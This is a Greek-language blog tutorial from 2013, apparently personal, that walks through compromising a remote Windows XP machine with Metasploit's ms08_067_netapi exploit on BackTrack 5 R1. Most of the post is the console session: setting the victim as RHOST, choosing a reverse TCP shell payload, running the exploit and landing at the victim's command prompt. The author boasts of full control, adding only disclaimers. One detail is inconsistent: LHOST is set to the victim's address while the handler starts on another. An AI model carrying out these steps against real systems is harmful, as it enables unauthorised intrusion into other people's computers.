!ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!

ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!
**** Σε αυτό το blog μερικά από τα άρθρα είναι αναδημοσιεύσεις από άρθρα του διαδικτύου και άλλα είναι προσωπικά tutorial που αναφέρονται σε διάφορα θέματα. Τα παραπάνω έγιναν για ενημέρωση του κοινού και εμπλουτισμό της εκπαιδευτικής διεύρυνσης. Όλα τα άρθρα είναι για εκπαιδευτικούς και μόνο σκοπούς. Δεν φέρω καμία ευθύνη εάν κάποιος αναγνώστης τα χρησιμοποιήσει κακόβουλα. ****

Παρασκευή 22 Φεβρουαρίου 2013

Πρόσβαση σε απόμακρο υπολογιστή με χρήση του ms08_067_netapi exploit - Backtrack 5 R1


Σε αυτό το tutorial θα δούμε έναν από τους τρόπους με τους οποίους μπορούμε να αποκτήσουμε τον έλεγχο σε ένα απομακρυσμένο υπολογιστή με τη χρήση του ms08_067_netapi exploit.
Πρώτα απ όλα πρέπει να έχουμε εγκατεστημένο το BackTrack 5 R1 στον υπολογιστή μας. Στη συνέχεια ανοίγουμε ένα τερματικό και ακολουθούμε τη σειρά εντολών που αναφέρω παρακάτω:
Ανοίγω ένα τερματικό...
Terminal:
root@bt:msfconsole <-|
[περιμένουμε να ενεργοποιηθεί λίγο το msfconsole]...
msf > search ms08_067_netapi <-|

[*] Searching loaded modules for pattern 'ms08_067_netapi'...
Exploits
========
Name
----
windows/smb/ms08_067_netapi
Corruption
Rank
----
great
Description
-----------
Microsoft Server Service Relative Path Stack


Συνχίζουμε γράφοντας τις παρακάτω εντολές...



msf > use windows/smb/ms08_067_netapi <-|
msf exploit(ms08_067_netapi) > show options <-|
msf exploit(ms08_067_netapi) > set RHOST 192.168.33.130 <-| (victim ip)
RHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp <-|
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options <-|
msf exploit(ms08_067_netapi) > set LHOST 192.168.33.130 <-| (attacker ip)
LHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > exploit <-|

[*] Started reverse handler on 192.168.33.129:8080
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1487)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

GAME OVER!!!

Όπως φαίνεται παραπάνω μπήκαμε στον υπολογιστή του θύματος μας και έχουμε μπροστά μας το μενού εντολών του MS-DOS... Από εκεί και πέρα μπορούμε να κάνουμε ότι θέλουμε αρκεί να γνωρίζουμε έστω και λίγες εντολές του MS-DOS.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

0 σχόλια:

Δημοσίευση σχολίου

Σημείωση: Μόνο ένα μέλος αυτού του ιστολογίου μπορεί να αναρτήσει σχόλιο.